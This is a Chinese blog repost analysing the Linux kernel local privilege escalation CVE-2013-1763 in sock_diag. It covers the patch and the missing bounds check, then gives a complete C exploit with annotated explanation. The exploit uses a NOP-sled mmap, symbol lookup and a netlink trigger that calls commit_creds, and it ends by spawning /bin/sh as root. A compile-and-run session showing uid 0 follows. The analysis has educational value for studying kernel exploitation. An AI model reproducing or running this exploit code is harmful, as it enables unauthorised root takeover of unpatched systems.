当前位置: 首页 > 编程日记 > 正文

一则利用内核漏洞获取root权限的案例【转】

转自:https://blog.csdn.net/u014089131/article/details/73933649

目录(?)[-]

  1. 漏洞描述
  2. 漏洞的影响范围
  3. 漏洞曝光时间
  4. 漏洞产生的原因
  5. 漏洞的利用
  6. exploit代码分析

kernel 最近出了一个新的本地提权安全漏洞CVE-2013-1763,影响范围比较广泛,ubuntu,Arch,fedora都受到其影响,漏洞刚公布就有牛人发布了利用该漏洞获取root权限的攻击代码,下面会分析该代码是如何获取root权限的。

首先对CVE-2013-1763这个安全漏洞简单介绍一下。

1. 漏洞描述

在net/core/sock_diag.c中,__sock_diag_rcv_msg函数未对sock_diag_handlers数组传入的下标做边界检查,导致可能越界,进而导致可执行代码的漏洞。没有root权限的用户可以利用该漏洞获取到root权限。

2. 漏洞的影响范围

linux kernel 3.0-3.7.10

3. 漏洞曝光时间

2013/02/19

4. 漏洞产生的原因

首先看一下这个漏洞的patch:

[cpp] view plaincopy
  1. net/core/sock_diag.c View file @ 6e601a5
  2. @@ -121,6 +121,9 @@ static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)  
  3. if (nlmsg_len(nlh) < sizeof(*req))  
  4. return -EINVAL;  
  5. +  if (req->sdiag_family >= AF_MAX)  
  6. +    return -EINVAL;  
  7. +
  8. hndl = sock_diag_lock_handler(req->sdiag_family);
  9. if (hndl == NULL)  
  10. err = -ENOENT;

Patch 很简单,只是加上了数组边界判断而已。那么在看看sock_diag_lock_hander这个函数做了些什么:

[cpp] view plaincopy
  1. static const inline struct sock_diag_handler *sock_diag_lock_handler(int family)  
  2. {
  3. if (sock_diag_handlers[family] == NULL)  
  4. request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK,  
  5. NETLINK_SOCK_DIAG, family);
  6. mutex_lock(&sock_diag_table_mutex);
  7. return sock_diag_handlers[family];//这个函数没有对传入的family的值的范围,进行验证,从而造成数组越界.  
  8. }

这个函数也没有做什么,只是对 sock_diag_lock_hander[family]进行检测,是否为NULL,如果为NULL申请注册,然后加上了一把锁,最后返回的是它的地址。

[cpp] view plaincopy
  1. static struct sock_diag_handler *sock_diag_handlers[AF_MAX];  //可以看出,这个指针数组最大为AF_MAX AF_MAX = 40.  
接着我们再看看完整的__sock_diag_rcv_msg函数。

[cpp] view plaincopy
  1. static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)  
  2. {
  3. int err;  
  4. struct sock_diag_req *req = NLMSG_DATA(nlh);  
  5. struct sock_diag_handler *hndl;  
  6. if (nlmsg_len(nlh) < sizeof(*req))  
  7. return -EINVAL;  
  8. hndl = sock_diag_lock_handler(req->sdiag_family);//这里传入sdiag_family的值,然后返回数组指针sock_diag_handlers[reg->sdiag_family].由于没有做边界判断,那么就可以越界。  
  9. if (hndl == NULL)  
  10. err = -ENOENT;
  11. else  
  12. err = hndl->dump(skb, nlh); //看到这里是不是很激动呢,利用这里可以让它执行我们自己的代码  
  13. sock_diag_unlock_handler(hndl);
  14. return err;  
  15. }

5. 漏洞的利用

虽然已经找到了kernel中有这样一个漏洞,但是如何利用这个漏洞来执行我们自己的程序,取得root权限还是需要很困难的,需要对kernel系统以及计算机运行原理非常了解才可以,并且这些程序往往需要精细设计才能达到最终的目的。 下面是某牛人写的exploit代码,请欣赏:

[cpp] view plaincopy
  1. /*  
  2. * quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 
  3. * bug found by Spender 
  4. * poc by SynQ 
  5. *  
  6. * hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux 
  7. * using nl_table->hash.rehash_time, index 81 
  8. *  
  9. * Fedora 18 support added 
  10. *  
  11. * 2/2013 
  12. */  
  13. #include <unistd.h>  
  14. #include <sys/socket.h>  
  15. #include <linux/netlink.h>  
  16. #include <netinet/tcp.h>  
  17. #include <errno.h>  
  18. #include <linux/if.h>  
  19. #include <linux/filter.h>  
  20. #include <string.h>  
  21. #include <stdio.h>  
  22. #include <stdlib.h>  
  23. #include <linux/sock_diag.h>  
  24. #include <linux/inet_diag.h>  
  25. #include <linux/unix_diag.h>  
  26. #include <sys/mman.h>  
  27. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);  
  28. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);  
  29. _commit_creds commit_creds;
  30. _prepare_kernel_cred prepare_kernel_cred;
  31. unsigned long sock_diag_handlers, nl_table;  
  32. int __attribute__((regparm(3)))    //这是指示GCC编译器选用3个寄存器代替堆栈来传递参数。  
  33. kernel_code()
  34. {
  35. commit_creds(prepare_kernel_cred(0));  //这行代码执行之后就可以获取root权限,但是这两个函数都是内核函数,必须在内核态执行才有效。  
  36. return -1;  
  37. }
  38. //这段函数没有使用,用来解释hard code jump[] 为什么是那些数值  
  39. int jump_payload_not_used(void *skb, void *nlh)  
  40. {
  41. asm volatile (  
  42. "mov $kernel_code, %eax\n"  
  43. "call *%eax\n"  
  44. );
  45. }
  46. unsigned long  
  47. get_symbol(char *name)  //为了获取内核函数地址  
  48. {
  49. FILE *f;  
  50. unsigned long addr;  
  51. char dummy, sym[512];  
  52. int ret = 0;  
  53. f = fopen("/proc/kallsyms", "r");  
  54. if (!f) {  
  55. return 0;  
  56. }
  57. while (ret != EOF) {  
  58. ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);  
  59. if (ret == 0) {  
  60. fscanf(f, "%s\n", sym);  
  61. continue;  
  62. }
  63. if (!strcmp(name, sym)) {  
  64. printf("[+] resolved symbol %s to %p\n", name, (void *) addr);  
  65. fclose(f);
  66. return addr;  
  67. }
  68. }
  69. fclose(f);
  70. return 0;  
  71. }
  72. int main(int argc, char*argv[])  
  73. {
  74. int fd;  
  75. unsigned family;
  76. struct {  
  77. struct nlmsghdr nlh;  //socket协议netlink数据包的格式  
  78. struct unix_diag_req r;  
  79. } req;
  80. char    buf[8192];  
  81. //创建一个netlink协议的socket,因为__sock_diag_rcv_msg函数是属于NETLINK_SOCK_DIAG的  
  82. if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){  
  83. printf("Can't create sock diag socket\n");  
  84. return -1;  
  85. }
  86. //填充数据包,就是为了最终能够执行到__sock_diag_rcv_msg中去  
  87. memset(&req, 0, sizeof(req));  
  88. req.nlh.nlmsg_len = sizeof(req);  
  89. req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
  90. req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
  91. req.nlh.nlmsg_seq = 123456;
  92. //req.r.sdiag_family = 89;  
  93. req.r.udiag_states = -1;
  94. req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
  95. if(argc==1){  
  96. printf("Run: %s Fedora|Ubuntu\n",argv[0]);  
  97. return 0;  
  98. }
  99. else if(strcmp(argv[1],"Fedora")==0){  
  100. commit_creds = (_commit_creds) get_symbol("commit_creds");  
  101. prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");  
  102. sock_diag_handlers = get_symbol("sock_diag_handlers");  
  103. nl_table = get_symbol("nl_table");  
  104. if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){  
  105. printf("some symbols are not available!\n");  
  106. exit(1);
  107. }
  108. family = (nl_table - sock_diag_handlers) / 4;
  109. printf("family=%d\n",family);  
  110. req.r.sdiag_family = family;
  111. if(family>255){  
  112. printf("nl_table is too far!\n");  
  113. exit(1);
  114. }
  115. }
  116. else if(strcmp(argv[1],"Ubuntu")==0){  
  117. commit_creds = (_commit_creds) 0xc106bc60;
  118. prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
  119. req.r.sdiag_family = 81;
  120. }
  121. unsigned long mmap_start, mmap_size;  
  122. mmap_start = 0x10000;  //选择了一块1MB多的内存区域  
  123. mmap_size = 0x120000;
  124. printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);  
  125. if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,  
  126. MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
  127. printf("mmap fault\n");  
  128. exit(1);
  129. }
  130. memset((void*)mmap_start, 0x90, mmap_size);         //将其全部填充为0x90,在X86系统中对应的是NOP指令  
  131. char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm  
  132. unsigned long *asd = &jump[4];  
  133. *asd = (unsigned long)kernel_code; //使用kernel_code函数的地址替换掉jump[]中的0x11  
  134. //将jump这段代码放在mmap内存区域的最后,也就是说只要最后能够跳转到这块区域,就可以执行到jump代码,进而跳转执行kernel_code,因为这块区域中布满了NOP指令。  
  135. memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));  
  136. //所有准备工作完成之后,最后在这里发送socket触发这个漏洞  
  137. if ( send(fd, &req, sizeof(req), 0) < 0) {  
  138. printf("bad send\n");  
  139. close(fd);
  140. return -1;  
  141. }
  142. printf("uid=%d, euid=%d\n",getuid(), geteuid() );  
  143. if(!getuid())  
  144. system("/bin/sh");  
  145. }

6. exploit代码分析

在分析之前,有些概念要澄清一下,在linux系统中,用户空间和内核空间是独立存在的。在一个32位的linux系统中,每个进程会虚拟出4G的内存空间,其中3G是用户空间,1G是内核空间,用户空间的地址范围是0×00000000 到 0xBFFFFFFF,内核空间的地址是0xC0000000 到 0xFFFFFFFF。内核地址空间由所有进程共享,但只有运行在内核态的进程才能访问,用户进程可以通过系统调用切换到内核态访问内核空间,进程运行在内核态时所产生的地址都属于内核空间。

commit_creds 和prepare_kernel_cred 均为内核函数,如果要执行他们就应该切换到内核状态运行。当执行内核函数__sock_diag_rcv_msg是处于内核态的,所以这个时候调用执行kernel_code函数就可以取得root权限。

那么如何调用kernel_code函数呢?所有我们mmap了一块从0x10000开始0x120000大小的内存空间,然后将这块空间写满NOP指令,将跳转执行kernel_code的代码放在这块区域的最后面,也就是说,只要跳转执行到这块内存区域的(除了jump代码块内部)都会顺利跑到kernel_code函数。这种方法叫做NOP slide,就像坐滑滑梯一样,自然滑到底部。jump这一段代码的分析如下:

[cpp] view plaincopy
  1. char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm  
  2. unsigned long *asd = &jump[4];  
  3. *asd = (unsigned long)kernel_code;  
  4. int jump_payload_not_used(void *skb, void *nlh)  
  5. {
  6. asm volatile (  
  7. "mov $kernel_code, %eax\n"  
  8. "call *%eax\n"  
  9. );
  10. }
  11. fengguoqing@VirtualBox:~/Downloads$ gcc CVE-2013-1763.c
  12. CVE-2013-1763.c: In function ‘main’:
  13. CVE-2013-1763.c:148:26: warning: initialization from incompatible pointer type [enabled by default]  
  14. fengguoqing@VirtualBox:~/Downloads$ objdump -D a.out
  15. ….
  16. 08048763 <jump_payload_not_used>:
  17. 8048763:   55                      push   %ebp
  18. 8048764:   89 e5                   mov    %esp,%ebp
  19. 8048766:   b8 3c 87 04 08          mov    $0x804873c,%eax
  20. 804876b:   ff d0                   call   *%eax
  21. 804876d:   5d                      pop    %ebp
  22. 804876e:   c3                      ret
  23. ….
  24. (gdb) p/x jump
  25. $2 = {0x55, 0x89, 0xe5, 0xb8, 0x3c, 0x87, 0x4, 0x8, 0xff, 0xd0, 0x5d, 0xc3, 0x0} //最后发现0x11被填充成了kernel_code的地址  
  26. (gdb) p kernel_code
  27. $4 = {int ()} 0x804873c <kernel_code>  

问题的关键变成了如何才能跳转到这一块内存区域呢?先看看下面这结构体的定义:

[cpp] view plaincopy
  1. struct nlmsghdr {  
  2. __u32       nlmsg_len;  /* Length of message including header */  
  3. __u16       nlmsg_type; /* Message content */  
  4. __u16       nlmsg_flags;    /* Additional flags */  
  5. __u32       nlmsg_seq;  /* Sequence number */  
  6. __u32       nlmsg_pid;  /* Sending process port ID */  
  7. };
  8. struct unix_diag_req {  
  9. __u8    sdiag_family;
  10. __u8    sdiag_protocol;
  11. __u16   pad;
  12. __u32   udiag_states;
  13. __u32   udiag_ino;
  14. __u32   udiag_show;
  15. __u32   udiag_cookie[2];
  16. };
  17. struct sock_diag_handler {  
  18. __u8 family;//  
  19. int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);  
  20. };
  21. struct netlink_table {  
  22. struct nl_portid_hash   hash; //取回这个值  
  23. struct hlist_head       mc_list;  
  24. struct listeners __rcu  *listeners;  
  25. unsigned int            flags;  
  26. unsigned int            groups;  
  27. struct mutex            *cb_mutex;  
  28. struct module           *module;  
  29. void                    (*bind)(int group);  
  30. int                     registered;  
  31. };
  32. struct nl_portid_hash {  
  33. struct hlist_head       *table; 四个字节  
  34. unsigned long           rehash_time; //也是四个字节.0x00012b59//这个值在我们的那个范围内.  
  35. unsigned int            mask;  
  36. unsigned int            shift;  
  37. unsigned int            entries;  
  38. unsigned int            max_shift;  
  39. u32                     rnd;
  40. };
  41. static struct netlink_table *nl_table;  


我们的牛人发现了nl_table里面有一个变量rehash_time的值正好在0x10000-0x130000这个区域内,所以可以利用这个值来跳转,只需要将sock_diag_handlers[sdiag_family]-dump正好落在这个值上就可以了。如下图所示

所以我们需要先知道nl_table和sock_diag_handlers的地址,可以通过以下两种方式查看。

[cpp] view plaincopy
  1. cat /proc/kallsyms
  2. sudo cat /boot/System.map-3.2.0-43-generic-pae

但是在ubuntu系统中前一种方法无法查看到变量函数的地址,所以只有使用第二种方法了,由于 nl_table和sock_diag_handlers都是指针,所以他们的大小都是4个字节。于是就可以计算出 sdiag_family的取值了。

[cpp] view plaincopy
  1. fengguoqing@VirtualBox:~$ sudo cat /boot/System.map-3.5.0-17-generic |grep nl_table
  2. c189b5c0 d nl_table_lock
  3. c189b5c4 d nl_table_wait
  4. c1a488e0 b nl_table_users
  5. c1a488e4 b nl_table
  6. fengguoqing@VirtualBox:~$ sudo cat /boot/System.map-3.5.0-17-generic |grep sock_diag_handlers
  7. c1a487a0 b sock_diag_handlers
  8. (0xc1a488e4 - 0xc1a487a0) / 4 = 81L

至此所有的谜题都解开了,然后就可以高高兴兴的黑自己一把了:

[cpp] view plaincopy
  1. fengguoqing@VirtualBox:~/Downloads$ gcc -o CVE-2013-1763 CVE-2013-1763.c
  2. CVE-2013-1763.c: In function ‘main’:
  3. CVE-2013-1763.c:148:26: warning: initialization from incompatible pointer type [enabled by default]  
  4. fengguoqing@VirtualBox:~/Downloads$ id
  5. uid=1000(fengguoqing) gid=1000(fengguoqing) groups=1000(fengguoqing),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
  6. fengguoqing@VirtualBox:~/Downloads$ ./CVE-2013-1763 Ubuntu
  7. mmapping at 0x10000, size = 0x120000
  8. uid=0, euid=0
  9. # id  
  10. uid=0(root) gid=0(root) groups=0(root)
  11. #  
由于在sock_diag_lock_handler中有mutex_lock(&sock_diag_table_mutex),但是我们在后面将程序引入到其他地方,并没有接着执行 mutex_unlock(&sock_diag_table_mutex),所以按道理只能root成功一次,但是我在测试中发现有时候可以root多次,有时候root一次之后就不能再root了,需要重启才可以重新root。

转载: https://my.oschina.net/fgq611/blog/156089

转载于:https://www.cnblogs.com/sky-heaven/p/8906930.html

相关文章:

Ext.data库

Ext.data 库主要包括以下几个类&#xff1a;Ext.data.Store >DataSetExt.data.Record >DataSet.RowExt.data.DataProxy >SqlConnectionExt.data.DataReader >SqlDataAdapter以下分别进行介绍:1.Ext.data.Record可以用来定义一行数据的格式,它有几个重要的属性和方法…

2021年最有用的数据清洗 Python 库

作者 | 周萝卜来源 | 萝卜大杂烩大多数调查表明&#xff0c;数据科学家和数据分析师需要花费 70-80% 的时间来清理和准备数据以进行分析。对于许多数据工作者来说&#xff0c;数据的清理和准备也往往是他们工作中最不喜欢的部分&#xff0c;因此他们将另外 20-30% 的时间花在抱…

组合与继承之重写方法和字段

为什么80%的码农都做不了架构师&#xff1f;>>> 接上篇blog&#xff0c;scala里的字段和方法属于相同的命名空间&#xff0c;这让字段可以重写无参数方法。例如&#xff0c;你可以通过改变ArrayElement类中contents的实现将其从一个方法变为一个字段&#xff0c;而…

20165334 四则运算阶段性总结(第二周)

四则运算阶段性总结&#xff08;第二周&#xff09; 结对对象 学号 &#xff1a;20165334 姓名 &#xff1a; 李天龙 担任角色 &#xff08;驾驶员&#xff09;&#xff1a;李天龙 &#xff08;副驾驶&#xff09;&#xff1a;陈国超 一、实验实现步骤 整数计算类分数计算类自动…

取消掉Transfer-Encoding:chunked

有时候&#xff0c;Web服务器生成HTTP Response是无法在Header就确定消息大小的&#xff0c;这时一般来说服务器将不会提供Content-Length的头信息&#xff0c;而采用Chunked编码动态的提供body内容的长度。进行Chunked编码传输的HTTP Response会在消息头部设置&#xff1a;Tra…

【LeetCode】142 - Linked List Cycle II

Given a linked list, return the node where the cycle begins. If there is no cycle, return null. Follow up:Can you solve it without using extra space? Solution&#xff1a; Discuss上的分析&#xff1a;Suppose the first meet at step k,the length of the Cycle …

3000 字详解 Pandas 数据查询,建议收藏

作者 | 俊欣来源 | 关于数据分析与可视化今天小编来和大家说一说怎么从DataFrame数据集中筛选符合指定条件的数据&#xff0c;希望会对读者朋友有所帮助。导入数据集和模块我们先导入pandas模块&#xff0c;并且读取数据&#xff0c;代码如下import pandas as pd df pd.read_c…

stylus使用文档总结:内置方法+参数+条件+迭代+导入+继承

一、内置方法 返回各种颜色的比重&#xff08;如red(color)等&#xff09; 颜色函数是CSS预处里器中内置的颜色函数功能&#xff0c;这些功能可以对颜色值进行处理&#xff0c;例如颜色的变亮、变暗、渐变颜色等处理十分的方便。 lighten(color, 10%); /* 返回的颜色在color基础…

用 Python 制作酷炫的可视化大屏,特简单!

作者 | 小F来源 | 法纳斯特在数据时代&#xff0c;我们每个人既是数据的生产者&#xff0c;也是数据的使用者&#xff0c;然而初次获取和存储的原始数据杂乱无章、信息冗余、价值较低。要想数据达到生动有趣、让人一目了然、豁然开朗的效果&#xff0c;就需要借助数据可视化。以…

HTTP协议中的Tranfer-Encoding:chunked编码解析

当不能预先确定报文体的长度时&#xff0c;不可能在头中包含Content-Length域来指明报文体长度&#xff0c;此时就需要通过Transfer-Encoding域来确定报文体长度。通常情况下&#xff0c;Transfer-Encoding域的值应当为chunked,表明采用chunked编码方式来进行报文体的传输。chu…

[转] splice系列系统调用

关注splice系列系统调用&#xff08;包括splice&#xff0c;tee和vmsplice&#xff09;已经有一段时间了&#xff0c;开始的时候并未能领会splice的意义所在&#xff0c;致使得出了“splice系列系统调用不怎么实用”的错误结论。随着内核研究的深入&#xff0c;才逐渐懂得&…

嵌入式s5vp210裸机 KXTF9-2050(G-sensor)

1.KXTF9-2050简介 KXTF9-205是G-sensor的一种&#xff0c;G-sensor&#xff08;Gravity sensor&#xff09;&#xff0c;重力传感器&#xff0c;又名加速度传感器&#xff08;accelerometer&#xff09;&#xff0c;是能感知加速度大小的MEMS(微机电系统)传感器。使用I2C协议和…

JavaScript面向对象编程

自从有了Ajax这个概念&#xff0c;JavaScript作为Ajax的利器&#xff0c;其作用一路飙升。JavaScript最基本的使用&#xff0c;以及语法、浏览器对象等等东东在这里就不累赘了。把主要篇幅放在如何实现JavaScript的面向对象编程方面。1. 用JavaScript实现类 JavaScritpt没…

sublime text3 前端插件介绍

Emmet插件 Emmet插件可以说是使用Sublime Text进行前端开发必不可少的插件 它让编写HTML代码变得极其简单高效 基本用法&#xff1a;输入标签简写形式&#xff0c;然后按Tab键 关于Emmet的更多介绍&#xff0c;请查看官方文档 这份速查表&#xff0c;可以帮你快速记忆简写形式 …

如何使用 OpenCV Python 检测颜色

作者 | 小白来源 | 小白学视觉在这篇文章中&#xff0c;我们将看到如何使用 Python 中的 OpenCV 模块检测颜色&#xff0c;进入这个领域的第一步就是安装下面提到的模块。pip install opencv-python pip install numpy然后&#xff0c;导入模块。读取图像并使用 OpenCV 模块中的…

使用树形结构保存实体

阅读原文请访问我的博客BrightLoongs Blog之前在项目需要实现一个功能——将xml文件映射成实体&#xff0c;然后对映射的实体进行逻辑处理&#xff0c;最后保存到数据库中&#xff1b;由于xml结构的数据是结构化的数据&#xff0c;所以需要保证保存的数据具有正确的主外键关联。…

在Javascript中使用面向对象的编程

by Mike Koss March 26th, 2003 这是一篇&#xff0c;我个人认为最好的&#xff0c;Javascript面向对象编程的文章。翻译不好的地方&#xff0c;还望大家指正&#xff0c;谢谢。 如果您需要&#xff0c;可以访问下面的地址取得原文&#xff1a; http://mckoss.com/jscript/obj…

马斯克嘲笑「元宇宙」的想法,并给年轻人5条鸡汤

编译 | 禾木木出品 | AI科技大本营&#xff08;ID:rgznai100&#xff09;SpaceX 和特斯拉的CEO 马斯克在接受 The Babylon Bee 的采访中&#xff0c;当被问到元宇宙的问题时&#xff0c;马斯克只笑了笑。马斯克表示&#xff1a;“我对元宇宙这个概念没有什么印象&#xff0c;尽…

OpenLDAP自定义属性的启用

2019独角兽企业重金招聘Python工程师标准>>> # ucode# This multivalued field is used to record the values of the license or# registration plate associated with an individual.attributetype ( 2.16.840.1.113730.3.1.900 NAME ucode DESC user code …

硬中断与软中断的区别!

硬中断&#xff1a; 1. 硬中断是由硬件产生的&#xff0c;比如&#xff0c;像磁盘&#xff0c;网卡&#xff0c;键盘&#xff0c;时钟等。每个设备或设备集都有它自己的IRQ&#xff08;中断请求&#xff09;。基于IRQ&#xff0c;CPU可以将相应的请求分发到对应的硬件驱动上&am…

smarty模板

<?phprequire(../libs/Smarty.class.php);$smarty new Smarty;//$smarty->force_compile true;//$smarty->debugging true;//$smarty->caching true;//$smarty->cache_lifetime 120;$Name"Linux环境高级编程";$smarty->assign("name&qu…

乘“云原生”之风、踏“数字化”的浪,《新程序员003》开启预售!

12月30日&#xff0c;新年的钟声还有两天敲响&#xff0c;CSDN倾情策划出品的《新程序员003&#xff1a;云原生和全面数字化实践》&#xff08;以下简称《新程序员003》&#xff09;重磅开启预售&#xff01;新一年&#xff0c;新气象~预祝所有开发者在新的一年中大神附体&…

BZOJ4245 : [ONTAK2015]OR-XOR

按位考虑&#xff0c;逐步确定答案。 设当前是第i位&#xff0c;求出第i位的前缀异或和。 若存在m个0且所有数字异或和为0&#xff0c;那么答案的这一位可以为0&#xff0c;并把所有1的位置给标记为不可选。 否则答案的这一位只能是1。 时间复杂度$O(n\log n)$。 #include<c…

关键词排名下降怎么办-优八学院给你支招

优八学院下面为大家解决一下关于关键词排名下降的问题。在我们进行网站优化的时候&#xff0c;往往会出现关键词排名下降的现象。对于这种情况&#xff0c;我们要区别是否是正常的浮动&#xff0c;由于有时候搜索引擎也会发生错误&#xff0c;导致关键词排名下降&#xff0c;我…

全面解析 Kmeans 聚类算法(Python)

作者 | 泳鱼来源 | 算法进阶一、聚类简介Clustering (聚类)是常见的unsupervised learning (无监督学习)方法&#xff0c;简单地说就是把相似的数据样本分到一组&#xff08;簇&#xff09;&#xff0c;聚类的过程&#xff0c;我们并不清楚某一类是什么&#xff08;通常无标签信…

.htaccess的重写规则

.htaccess基本语法和应用 .htaccess是Apache服务器的一个非常强大的分布式配置文件。正确的理解和使用.htaccess文件&#xff0c;可以帮助我们优化自己的服务器或者虚拟主机。 如何启用htaccess 以windows为例&#xff0c;进入apache/conf目录&#xff0c;找到httpd.conf文件&a…

amaze ui各个模块简单说明

amaze ui各个模块简单说明 导航添加依据 http://amazeui.org/css/ 下面内容属学习笔记&#xff0c;如有理解偏差和错误请留言相告&#xff0c;感谢&#xff01;* &#xff08;官网这块写的很详细&#xff09; 一、基本样式 1.统一样式 说明了为什么使用Normalize&#xff0c;而…

由浅入深剖析.htaccess

1、.htaccess文件使用前提.htaccess的主要作用就是实现url改写&#xff0c;也就是当浏览器通过url访问到服务器某个文件夹时&#xff0c;作为主人&#xff0c;我们可以来接待这个url&#xff0c;具体地怎样接待它&#xff0c;就是此文件的作用。所有的访问都是通过URL实现&…

分享几个 Pyecharts 技巧,助你画出更直观/炫酷的图表

作者 | 俊欣来源 | 关于数据分析与可视化想必大家应该也已经看到很多关于数据分析的内容了&#xff0c;今天小编就为大家来分享一下国产可视化库pyecharts在绘制图表时一些的技巧&#xff0c;帮助读者画出更加酷炫以及可读性更高的图&#xff0c;当然在这之前呢&#xff0c;我们…

虚拟化--006 VCAC的sso配置成功

转载于:https://blog.51cto.com/williamliuwen/1686492